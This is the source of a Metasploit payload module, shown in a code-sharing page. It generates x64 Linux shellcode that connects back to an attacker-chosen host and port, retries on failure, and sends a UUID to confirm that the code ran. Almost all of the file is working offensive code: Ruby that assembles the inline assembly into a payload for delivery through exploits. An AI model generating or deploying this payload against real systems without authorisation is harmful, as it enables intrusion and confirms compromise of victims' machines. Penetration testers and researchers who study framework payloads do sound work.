Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7

8
module MetasploitModule
9

10
  CachedSize = 125
11

12
  include Msf::Payload::Linux
13
  include Msf::Payload::Single
14
  include Msf::Payload::Pingback
15
  include Msf::Payload::Pingback::Options
16

17
  def initialize(info = {})
18
    super(merge_info(info,
19
      'Name'          => 'Linux x64 Pingback, Reverse TCP Inline',
20
      'Description'   => 'Connect back to attacker and report UUID (Linux x64)',
21
      'Author'        => [ 'bwatters-r7' ],
22
      'License'       => MSF_LICENSE,
23
      'Platform'      => 'linux',
24
      'Arch'          => ARCH_X64,
25
      'Handler'       => Msf::Handler::ReverseTcp,
26
      'Session'       => Msf::Sessions::Pingback
27
    ))
28
    def generate(opts={})
29
      # 22 -> "0x00,0x16"
30
      # 4444 -> "0x11,0x5c"
31
      encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
32
      encoded_host = Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
33
      encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
34
      retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
35

36
      self.pingback_uuid ||= self.generate_pingback_uuid
37
      uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
38
      seconds = 5.0
39
      sleep_seconds = seconds.to_i
40
      sleep_nanoseconds = (seconds % 1 * 1_000_000_000).to_i
41

42
      asm = %Q^
43
        push   #{retry_count}        ; retry counter
44
        pop    r9
45
        push   rsi
46
        push   rax
47
        push   0x29
48
        pop    rax
49
        cdq
50
        push   0x2
51
        pop    rdi
52
        push   0x1
53
        pop    rsi
54
        syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
55
        test   rax, rax
56
        js failed
57

58
        xchg   rdi, rax
59

60
      connect:
61
        mov    rcx, #{encoded_host_port}
62
        push   rcx
63
        mov    rsi, rsp
64
        push   0x10
65
        pop    rdx
66
        push   0x2a
67
        pop    rax
68
        syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
69
        pop    rcx
70
        test   rax, rax
71
        jns    send_pingback
72

73
      handle_failure:
74
        dec    r9
75
        jz     failed
76
        push   rdi
77
        push   0x23
78
        pop    rax
79
        push   0x#{sleep_nanoseconds.to_s(16)}
80
        push   0x#{sleep_seconds.to_s(16)}
81
        mov    rdi, rsp
82
        xor    rsi, rsi
83
        syscall                      ; sys_nanosleep
84
        pop    rcx
85
        pop    rcx
86
        pop    rdi
87
        test   rax, rax
88
        jns    connect
89

90
      failed:
91
        push   0x3c
92
        pop    rax
93
        push   0x1
94
        pop    rdi
95
        syscall ; exit(1)
96

97
      send_pingback:
98
        push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
99
        pop rdx
100
        call get_uuid_address         ; put uuid buffer on the stack
101
        db #{uuid_as_db}  ; PINGBACK_UUID
102

103
      get_uuid_address:
104
        pop rsi                       ; UUID address
105
        xor rax, rax
106
        inc rax
107
        syscall                      ; sys_write
108

109
      jmp failed
110
      ^
111
      Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
112
    end
113
  end
114
end
115

116